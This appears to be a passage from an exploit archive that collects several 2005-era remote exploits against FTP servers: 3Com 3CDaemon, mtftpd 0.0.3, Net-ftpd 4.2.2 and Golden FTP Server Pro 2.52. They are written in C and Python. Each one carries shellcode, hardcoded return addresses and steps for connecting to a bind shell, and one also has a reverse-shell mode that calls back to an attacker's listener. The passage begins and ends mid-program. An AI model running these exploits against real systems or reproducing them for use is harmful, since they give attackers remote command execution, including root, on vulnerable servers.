"\xDC\x9D\x23\x0E\xD1\x16\xC3\x64\xA4\xCF\x74\xF1\x E1\xBB\x70\x59"
"\x4B\xCA\x0B\x5D\xE0\xC8\xDC\x5B\x94\x16\xE4\x66\x F7\xD2\x67\x0E"
"\x3D\x7C\xA4\xF4\x85\x5F\xAE\x72\x90\x33\x49\x1B\x ED\x6C\x88\x89"
"\x4E\x1C\xCF\x5A\x72\xDB\x07\x1E\xF0\xF9\xE4\x4A\x 90\xA3\x22\x0F"
"\x3D\xE3\x07\x46\x3D\xE3\x07\x42\x3D\xE3\x07\x5E\x 39\xDB\x07\x1E"
"\xE0\xCF\x72\x5F\xE5\xDE\x72\x47\xE5\xCE\x70\x5F\x 4B\xEA\x23\x66"
"\xC6\x61\x90\x18\x4B\xCA\x27\xF1\x64\x16\xC5\xF1\x C1\x9F\x4B\xA3"
"\x6D\x9A\xED\xF1\xE1\x9B\xAA\xCD\xDE\x60\xDC\x38\x 4B\x4C\xDC\x7B"
"\xB4\xF7\xD3\x84\xB0\xC0\xDC\x5B\xB0\xAE\xF8\x5D\x 4B\x4F\x23";
char payload[1024];
char ebx[]="\x08\xB0\x01\x78";
char ebx2[]="\xB1\x2C\xC2\x77";
char pad[]="\xEB\x0C\x90\x90";
char EOL[]="\x0D\x0A";
#ifdef WIN32
WSADATA wsadata;
#endif
void ver();
void usage(char* us);
int main(int argc,char *argv[])
{
ver();
unsigned long gip;
unsigned short gport;
char *target, *os;
if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x93939393;
gport=htons(atoi(argv[5]))^(short)0x9393;
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x93939393;
gport=htons(atoi(argv[5]))^(USHORT)0x9393;
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=21;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro. English\n[+] Win2k SP4 Pro. Norsk\n[+] Win2k SP4 Server German\n[+] Win2k SP4 Pro. Dutch\n[+] Etc...";}
if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2 Pro. English\n[+] WinXP SP1a Pro. English\n[+] WinXP SP1 Pro. English";}
printf("[+] target(s): %s\n",os);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
strcpy(payload,"USER ");
memset(payload+5,0x90,700);
memcpy(payload+5+229,&pad,4);
memcpy(payload+238,target,4);
if (argc==6)
{
memcpy(&scode1[5], &gip, 4);
memcpy(&scode1[3], &gport, 2);
memcpy(payload+253,scode1,sizeof(scode1));
}
else memcpy(payload+253,scode2,sizeof(scode2));
strcat(payload,EOL);
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
#ifdef WIN32
Sleep(2000);
#else
Sleep(2);
#endif
printf("[+] size of payload: %d\n",strlen(payload));
printf("[+] payload sent.\n");
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf("USAGE:\n");
printf(" [+] . 101_3com.exe Target VulnIP (bind mode)\n");
printf(" [+] . 101_3com.exe Target VulnIP VulnPORT (bind mode)\n");
printf(" [+] . 101_3com.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode)\n");
printf("TARGET: \n");
printf(" [+] 1. Win2k SP4 Server English (*)\n");
printf(" [+] 1. Win2k SP4 Pro English (*)\n");
printf(" [+] 1. Win2k SP4 Server German (*)\n");
printf(" [+] 1. Win2k SP4 Pro China (*)\n");
printf(" [+] 1. Win2k SP4 Pro Dutch (*)\n");
printf(" [+] 1. Win2k SP4 Pro Norsk (*)\n");
printf(" [+] 2. WinXP SP2 Pro. English \n");
printf(" [+] 2. WinXP SP1a Pro. English (*)\n");
printf(" [+] 2. WinXP SP1 Pro. English \n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or\n");
printf(" reverse a cmdshell on your listener.\n");
printf(" A wildcard (*) mean tested working, else, supposed working.\n");
printf(" Compilation msvc6, cygwin, Linux.\n");
return;
}
void ver()
{
printf(" \n");
printf(" ================================================== =[0.1]=====\n");
printf(" ================3COM 3CDaemon v2.0 Revision 10===============\n");
printf(" ==============FTP Service, Remote Stack Overflow=============\n");
printf(" ======coded by class101=============[Hat-Squad.com 2005]=====\n");
printf(" ================================================== ===========\n");
printf(" \n");
}
// [2005-02-18]
21 mtftpd <= 0.0.3 Remote Root Exploit
/*
\ mtftpd <= 0.0.3 remote root exploit
/ by darkeagle
\
/ discovered by darkeagle - xx.10.04
\
/ (c) unl0ck research team [http://unl0ck.org]
\
/ greetz: unl0ckerZ, rosielloZ, nosystemZ, etc..
\
/ [darkeagle@localhost darkeagle]$ ./0x666-ftpd -a 127.0.0.1 -p beautifulgirlz -u darkeagle
mtftpd <= 0.0.3 remote root exploit
by darkeagle [http://unl0ck.org]
[`] GOT: 0x804fcb0
[`] Retaddr: 0xbffff8d8
[`] Username: darkeagle
[`] Password: beautifulgirlz
[`] IP: 127.0.0.1
[`] Port: 21
[`] Creating SOCKET structure...
[+] Structure Done!
[`] Connecting... OK!
[+] Sending LOGIN DATA
[+] Successfully logged!
[`] Creating EviL Data... OK!
[`] Sending... OK!
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
id; uname -a;
uid=0(root) gid=0(root) groups=0(root)
Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux
: command not found
\
/
\ *--------------------------------------------*
/ mailto: darkeagle [at] linkin-park [dot] cc
\ darkeagle [at] unl0ck [dot] org
/ *-------------------------------------------*
\
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define PORT 21
#define doit( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
}
#define GOT_ADDR 0x0804fcb0
#define RETADDR 0xbffff8d8
char shellcode[] = //binds 2003 port
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x 8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x 89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x 14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x 0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\x cd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\x b0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x 68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
int usage ( char *proga )
{
printf("\n\nmtftpd <= 0.0.3 remote root exploit\n");
printf("by darkeagle\n");
printf("\nusage: %s <options>\n\nOptions:\n-a <ip_address>\n-p <password>\n-u <username>\n-g <gotaddr>\n-r <retaddr>\n\n", proga);
printf("EnJoY!\n\n");
exit(0);
}
char *
build_un( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
char * buf;
unsigned int length = 128;
unsigned char b0, b1, b2, b3;
int start = 256;
doit( b0, b1, b2, b3, retaddr );
if ( !(buf = (char *)malloc(length * sizeof(char))) ) {
fprintf( stderr, "Can't allocate buffer (%d)\n", length );
exit( -1 );
}
memset( buf, 0, length );
b3 -= figure;
b2 -= figure;
b1 -= figure;
b0 -= figure;
snprintf( buf, length,
"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
b3 - (sizeof( size_t ) * 4) + start - base, offset,
b2 - b3 + start, offset + 1,
b1 - b2 + start, offset + 2,
b0 - b1 + start, offset + 3 );
return buf;
}
int
main( int argc, char * argv[] )
{
char opt;
char * fmt;
char * endian;
unsigned long locaddr, retaddr;
unsigned int offset, base, align = 0;
unsigned char b0, b1, b2, b3;
int length, ch;
char *username = NULL;
char *password = NULL, *ip = NULL;
char evil[3000];
int f_got = 0;
int f_retaddr = 0;
char databuf[300];
struct sockaddr_in final;
int Socket;
char exec[300];
char recva[200];
if ( argc < 6 ) { usage(argv[0]); }
printf("\n\nmtftpd <= 0.0.3 remote root exploit\n");
printf("by darkeagle [http://unl0ck.org]\n");
while ((opt = getopt(argc, argv,"p:u:a:g:r:")) != EOF) {
switch (opt) {
case 'p':
password = optarg;
break;
case 'a':
ip = optarg;
break;
case 'g':
f_got = strtoul(optarg,NULL,0);
break;
case 'r':
f_retaddr = strtoul(optarg,NULL,0);
break;
case 'u':
username = optarg;
break;
default:
usage(argv[0]);
break;
}
}
if ( f_got == 0 || f_retaddr == 0 )
{
f_got = GOT_ADDR;
f_retaddr = RETADDR;
}
printf("\n [`] GOT: 0x%x\n [`] Retaddr: 0x%x\n [`] Username: %s\n [`] Password: %s\n [`] IP: %s\n [`] Port: %d\n", f_got, f_retaddr, username, password, ip, 21);
printf(" [`] Creating SOCKET structure...\n");
final.sin_family = AF_INET;
final.sin_port = htons(PORT);
final.sin_addr.s_addr = inet_addr(ip);
Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
printf(" [+] Structure Done!\n");
printf(" [`] Connecting...\t");
if ( connect(Socket, (struct sockaddr*)&final, sizeof(final)) == -1 ) { printf("FAILED!\n"); exit(0); }
printf("OK!\n");
printf(" [+] Sending LOGIN DATA\n");
snprintf(databuf, 300, "USER %s\r\n\r\nPASS %s\r\n\r\n", username, password);
send(Socket, databuf, strlen(databuf), 0);
recv(Socket, recva, sizeof(recva), 0);
if ( strstr(recva, "230" ) ) { printf(" [+] Successfully logged!\n"); } else {
printf(" [-] Invalid login or password!\n\n");
exit(0); }
printf(" [`] Creating EviL Data...\t");
length = ( sizeof( size_t ) * 16 ) + 1;
if ( !(endian = (char *)malloc(length * sizeof(char))) ) {
fprintf( stderr, "Can't allocate buffer (%d)\n", length );
exit( -1 );
}
memset( endian, 0, length );
ch = 0;
locaddr = f_got; // syslog GOT
retaddr = f_retaddr; // return address to shellcode
offset = 12; // offset to 0x2e414141 - CWD AAAA%12$x
base = 4;
//locaddr += 0x4;
doit( b0, b1, b2, b3, locaddr );
if ( base%4 ) {
align = 4 - ( base%4 );
base += align;
}
strcat(endian, "U");
snprintf( endian+strlen(endian), length,
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 1, b2, b1, b0,
b3 + 2, b2, b1, b0,
b3 + 3, b2, b1, b0 );
fmt = build_un( retaddr, offset, base, 0xF + 0x1 );
memset(fmt+strlen(fmt), 0x42, 48);
strcat(fmt, shellcode);
sprintf(evil, "CWD %s\r\n\r\n", fmt);
if ( strlen(evil) >= 256 ) { printf("FAILED!\n"); exit(0); }
printf("OK!\n");
printf(" [`] Sending...\t");
send(Socket, evil, strlen(evil), 0);
printf("OK!\n");
sprintf(exec, "telnet %s 2003\n", ip);
printf(" [+] Connecting to shell...\t");
sleep(2);
system(exec);
printf("FAILED!\n\n");
return 0;
}
// [2005-03-29]
21 NetFTPd 4.2.2 User Authentication Remote Buffer Overflow Exploit
#
# Net-ftpd 4.2.2 user autentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#
import struct
import socket
import sys
import time
class warftpd:
def __init__(self, host, port):
self.host = host
self.port = port
self.bsize = 512
self.ebpaddr = 0xcacacaca
self.retaddr = 0xdeadbeef
self.sctype = 'findskt'
self.scport = None
def setebpaddr(self, addr):
self.ebpaddr = addr
def setretaddr(self, addr):
self.retaddr = addr
def setbsize(self, size):
self.bsize = size
def setsctype(self, type):
self.sctype = type
def setscport(self, port):
self.scport = port
def genbuffer(self):
##
# Alpha port bind 4444, thanx metasploit
##
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
sc += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x 51\x5a\x6a\x46"
sc += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x56\x42\x 32\x42\x41\x32"
sc += "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x 79\x6b\x4c\x70"
sc += "\x6a\x78\x6b\x70\x4f\x6d\x38\x59\x69\x49\x6f\x69\x 6f\x6b\x4f\x61"
sc += "\x70\x4c\x4b\x70\x6c\x35\x74\x66\x44\x6c\x4b\x73\x 75\x45\x6c\x4c"
sc += "\x4b\x31\x6c\x55\x55\x62\x58\x54\x41\x38\x6f\x6e\x 6b\x50\x4f\x57"
sc += "\x68\x4c\x4b\x33\x6f\x65\x70\x56\x61\x38\x6b\x69\x 73\x50\x30\x37"
sc += "\x39\x6c\x4b\x50\x34\x4e\x6b\x77\x71\x58\x6e\x34\x 71\x4b\x70\x4a"
sc += "\x39\x6e\x4c\x6b\x34\x4f\x30\x64\x34\x35\x57\x6b\x 71\x6b\x7a\x56"
sc += "\x6d\x53\x31\x78\x42\x7a\x4b\x69\x64\x35\x6b\x32\x 74\x61\x34\x76"
sc += "\x48\x44\x35\x4d\x33\x4c\x4b\x63\x6f\x56\x44\x37\x 71\x5a\x4b\x50"
sc += "\x66\x6e\x6b\x66\x6c\x32\x6b\x4c\x4b\x31\x4f\x45\x 4c\x75\x51\x38"
sc += "\x6b\x34\x43\x76\x4c\x4c\x4b\x6b\x39\x72\x4c\x45\x 74\x47\x6c\x63"
sc += "\x51\x7a\x63\x45\x61\x4f\x30\x53\x54\x4e\x6b\x67\x 30\x30\x30\x4c"
sc += "\x4b\x63\x70\x34\x4c\x4e\x6b\x34\x30\x37\x6c\x4e\x 4d\x4e\x6b\x71"
sc += "\x50\x55\x58\x61\x4e\x73\x58\x6e\x6e\x70\x4e\x64\x 4e\x68\x6c\x70"
sc += "\x50\x4b\x4f\x6b\x66\x30\x31\x49\x4b\x50\x66\x52\x 73\x53\x56\x30"
sc += "\x68\x74\x73\x57\x42\x43\x58\x61\x67\x61\x63\x75\x 62\x63\x6f\x36"
sc += "\x34\x49\x6f\x58\x50\x45\x38\x4a\x6b\x4a\x4d\x39\x 6c\x57\x4b\x56"
sc += "\x30\x69\x6f\x5a\x76\x43\x6f\x4d\x59\x78\x65\x35\x 36\x4c\x41\x48"
sc += "\x6d\x66\x68\x37\x72\x71\x45\x62\x4a\x64\x42\x6b\x 4f\x38\x50\x35"
sc += "\x38\x6e\x39\x64\x49\x7a\x55\x4c\x6d\x31\x47\x79\x 6f\x6e\x36\x56"
sc += "\x33\x62\x73\x72\x73\x30\x53\x71\x43\x77\x33\x30\x 53\x67\x33\x36"
sc += "\x33\x59\x6f\x7a\x70\x30\x66\x70\x68\x76\x71\x73\x 6c\x41\x76\x72"
sc += "\x73\x6f\x79\x7a\x41\x4c\x55\x32\x48\x4c\x64\x44\x 5a\x74\x30\x4a"
sc += "\x67\x56\x37\x49\x6f\x4a\x76\x51\x7a\x44\x50\x42\x 71\x53\x65\x6b"
sc += "\x4f\x38\x50\x30\x68\x6f\x54\x4e\x4d\x44\x6e\x79\x 79\x30\x57\x79"
sc += "\x6f\x68\x56\x41\x43\x30\x55\x4b\x4f\x4a\x70\x52\x 48\x4d\x35\x67"
sc += "\x39\x6f\x76\x30\x49\x33\x67\x6b\x4f\x4a\x76\x72\x 70\x63\x64\x61"
sc += "\x44\x30\x55\x49\x6f\x38\x50\x4c\x53\x65\x38\x4b\x 57\x72\x59\x6a"
sc += "\x66\x63\x49\x72\x77\x69\x6f\x78\x56\x41\x45\x4b\x 4f\x6a\x70\x70"
sc += "\x66\x70\x6a\x63\x54\x61\x76\x30\x68\x43\x53\x72\x 4d\x6c\x49\x68"
sc += "\x65\x53\x5a\x70\x50\x53\x69\x76\x49\x6a\x6c\x6f\x 79\x4d\x37\x61"
sc += "\x7a\x67\x34\x4e\x69\x59\x72\x37\x41\x6b\x70\x6a\x 53\x4c\x6a\x59"
sc += "\x6e\x53\x72\x56\x4d\x59\x6e\x33\x72\x64\x6c\x6c\x 53\x4e\x6d\x42"
sc += "\x5a\x35\x68\x4c\x6b\x6e\x4b\x4e\x4b\x72\x48\x44\x 32\x6b\x4e\x4d"
sc += "\x63\x54\x56\x79\x6f\x43\x45\x32\x64\x6b\x4f\x6b\x 66\x33\x6b\x53"
sc += "\x67\x30\x52\x63\x61\x66\x31\x52\x71\x53\x5a\x74\x 41\x56\x31\x32"
sc += "\x71\x73\x65\x50\x51\x4b\x4f\x5a\x70\x32\x48\x6c\x 6d\x4a\x79\x47"
sc += "\x75\x48\x4e\x62\x73\x6b\x4f\x7a\x76\x61\x7a\x6b\x 4f\x6b\x4f\x35"
sc += "\x67\x6b\x4f\x68\x50\x6e\x6b\x31\x47\x4b\x4c\x6d\x 53\x68\x44\x41"
sc += "\x74\x4b\x4f\x4e\x36\x36\x32\x49\x6f\x68\x50\x75\x 38\x6c\x30\x4f"
sc += "\x7a\x56\x64\x31\x4f\x43\x63\x59\x6f\x4a\x76\x4b\x 4f\x38\x50\x46"
# shellcode
#sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\xe0\x66"
#sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x 66\x4f\x97\xb6"
#sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x 67\xf6\x49\xaa"
#sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x 67\xf2\xf3\x1f"
#sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\x a1\xf7\x30\xdb"
#sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x 6a\x57\x49\xba"
#sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x 39\x42\x9f\xbb"
#sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x 6a\x97\x99\xfc"
#sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\x b0\x95\x05\x61"
#sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x 66\x1c\xc2\x70"
#sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x 2f\x9a\x8b\x44"
#sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x 8b\xe0\xf9\xb7"
#sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\x b1\x95\x1d\x69"
#sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x 99\x49\xc6\xb9"
#sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x 56\x2d\x02\xb0"
#sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x 57\xc7\x91\xb3"
#sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x 33\x38\x91\xb7"
#sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x 25\x51\x86\xe0"
#sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x 3f\xef\x69\x67"
#sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x 42\x20\xc3\xe1"
#sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\x eb\x58\xe6\xf0"
#sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x 99\x69\xc2\x88"
#sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x 13\x1c\xaa\x4d"
#sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x 99\xcf\x3d\x95"
#sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x 99\xcc\xc2"
# other stuff
nops = "\x41"*(self.bsize-len(sc)-50)
ebp = struct.pack('<L', self.ebpaddr)
# check if the value is an integer, otherwise it should be a string
if self.retaddr.__class__.__name__ == 'int':
ret = struct.pack('<L', self.retaddr)
else:
ret = self.retaddr
# assemble buffer to send
buffer = "USER "
buffer += nops
buffer += sc
buffer += '\x42'*(50-4)
buffer += ebp
buffer += ret
return buffer
def exploit(self):
# connect
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
skt.connect((self.host, self.port))
except socket.error, err:
print "[-] Error: %s" % err[1]
return None
print "[+] Connected to %s:%d" % (self.host, self.port)
# recv banner
print "[+] Receiving Banner"
res = skt.recv(100)
print res
# send payload
time.sleep(1)
print "[+] Sending payload"
skt.send(self.genbuffer())
time.sleep(2) # test on mcafee anti-b0f
skt.close()
# if successfull connect to the shell
time.sleep(2)
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
skt.connect((self.host, 4444))
except socket.error, err:
print "[-] Error: %s" % err[1]
print "[-] Explotation failed\n[-] Daemon should be dead..."
return None
print "[+] Connected to shell at %s on port %d" % (self.host, 4444)
res = skt.recv(1024)
if res:
if res.count('Microsoft Windows'):
print "[+] Welcome my lord, i'm here to serve you ;) ...\n"
from telnetlib import Telnet
telnet = Telnet()
telnet.sock = skt
try:
telnet.interact()
except:
pass
skt.close()
print "[-] Bye..bye I hope you've enjoyed your stay.. ;)"
return None
skt.close()
print '[-] Explotation failed\nDaemon should be dead...'
if __name__ == '__main__':
if len(sys.argv) != 3:
print "*************************************"
print "* Coded by Sergio 'shadown' Alvarez *"
print "* [email protected] *"
print "*************************************"
print "Usage: %s host port" % sys.argv[0]
sys.exit(1)
exp = warftpd(sys.argv[1], int(sys.argv[2]))
exp.setsctype('findskt')
exp.setscport(1234)
exp.setbsize(1014)
exp.setebpaddr(0xdeadbeef) # sometimes needed, just in case
exp.setretaddr('\x4c\xfa\x12\x00') # Universal Win2k SP0/SP1/SP2/SP3/SP4 (jmp to our input buffer)
exp.exploit()
# [2005-04-26]
21 Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit
/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: [email protected]
* Credit to kozan and metasploit
* Usage:exploit <targetOs> <targetIp>
*
*/
/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. Afterward, right
* click on the Golden FTP Server Pro icon in the Windows tray and click
* Statistic.
* It will open bind shell on port 4444
*
*/
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char *target[]= //return addr
{
"\xFC\x18\xD7\x77", //WinXp Sp1 Eng - jmp esp addr
"\xBF\xAC\xDA\x77" //WinXp Sp2 Eng - jmp esp addr
};
char shellcode[] =
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub http://metasploit.com */
"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x82"
"\x2a\x64\x94\x83\xeb\xfc\xe2\xf4\x7e\x40\x8f\xdb\x 6a\xd3\x9b\x6b"
"\x7d\x4a\xef\xf8\xa6\x0e\xef\xd1\xbe\xa1\x18\x91\x fa\x2b\x8b\x1f"
"\xcd\x32\xef\xcb\xa2\x2b\x8f\x77\xb2\x63\xef\xa0\x 09\x2b\x8a\xa5"
"\x42\xb3\xc8\x10\x42\x5e\x63\x55\x48\x27\x65\x56\x 69\xde\x5f\xc0"
"\xa6\x02\x11\x77\x09\x75\x40\x95\x69\x4c\xef\x98\x c9\xa1\x3b\x88"
"\x83\xc1\x67\xb8\x09\xa3\x08\xb0\x9e\x4b\xa7\xa5\x 42\x4e\xef\xd4"
"\xb2\xa1\x24\x98\x09\x5a\x78\x39\x09\x6a\x6c\xca\x ea\xa4\x2a\x9a"
"\x6e\x7a\x9b\x42\xb3\xf1\x02\xc7\xe4\x42\x57\xa6\x ea\x5d\x17\xa6"
"\xdd\x7e\x9b\x44\xea\xe1\x89\x68\xb9\x7a\x9b\x42\x dd\xa3\x81\xf2"
"\x03\xc7\x6c\x96\xd7\x40\x66\x6b\x52\x42\xbd\x9d\x 77\x87\x33\x6b"
"\x54\x79\x37\xc7\xd1\x79\x27\xc7\xc1\x79\x9b\x44\x e4\x42\x75\xc8"
"\xe4\x79\xed\x75\x17\x42\xc0\x8e\xf2\xed\x33\x6b\x 54\x40\x74\xc5"
"\xd7\xd5\xb4\xfc\x26\x87\x4a\x7d\xd5\xd5\xb2\xc7\x d7\xd5\xb4\xfc"
"\x67\x63\xe2\xdd\xd5\xd5\xb2\xc4\xd6\x7e\x31\x6b\x 52\xb9\x0c\x73"
"\xfb\xec\x1d\xc3\x7d\xfc\x31\x6b\x52\x4c\x0e\xf0\x e4\x42\x07\xf9"
"\x0b\xcf\x0e\xc4\xdb\x03\xa8\x1d\x65\x40\x20\x1d\x 60\x1b\xa4\x67"
"\x28\xd4\x26\xb9\x7c\x68\x48\x07\x0f\x50\x5c\x3f\x 29\x81\x0c\xe6"
"\x7c\x99\x72\x6b\xf7\x6e\x9b\x42\xd9\x7d\x36\xc5\x d3\x7b\x0e\x95"
"\xd3\x7b\x31\xc5\x7d\xfa\x0c\x39\x5b\x2f\xaa\xc7\x 7d\xfc\x0e\x6b"
"\x7d\x1d\x9b\x44\x09\x7d\x98\x17\x46\x4e\x9b\x42\x d0\xd5\xb4\xfc"
"\x72\xa0\x60\xcb\xd1\xd5\xb2\x6b\x52\x2a\x64\x94";
char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90";
char passreq[] =
"PASS \r\n";
void main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
SOCKET mysocket;
char rec[1024];
if (argc < 3)
{
printf("\r\nGolden FTP Server Pro Remote Buffer Overflow Exploit\r\n",argv[0]);
printf("Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)\r\n");
printf("Exploit coded By ATmaCA\r\n");
printf("Web: atmacasoft.com && spyinstructors.com\r\n");
printf("Credit to kozan and metasploit\r\n");
printf("Usage:\r\nexploit <targetOs> <targetIp>\r\n\r\n",argv[0]);
printf("Targets:\n");
printf("1 - WinXP SP1 english\n");
printf("2 - WinXP SP2 english\n");
printf("Example:exploit 2 127.0.0.1\n");
return;
}
int targetnum = atoi(argv[1]) - 1;
char *evilbuf = (char*)malloc(sizeof(userreq)+sizeof(shellcode)+si zeof(nops)
+sizeof(passreq)+7);
strcpy(evilbuf,userreq);
strcat(evilbuf,target[targetnum]);
strcat(evilbuf,nops);
strcat(evilbuf,shellcode);
strcat(evilbuf,"\r\n");
strcat(evilbuf,passreq);
//printf("%s",evilbuf);
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return;
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET){
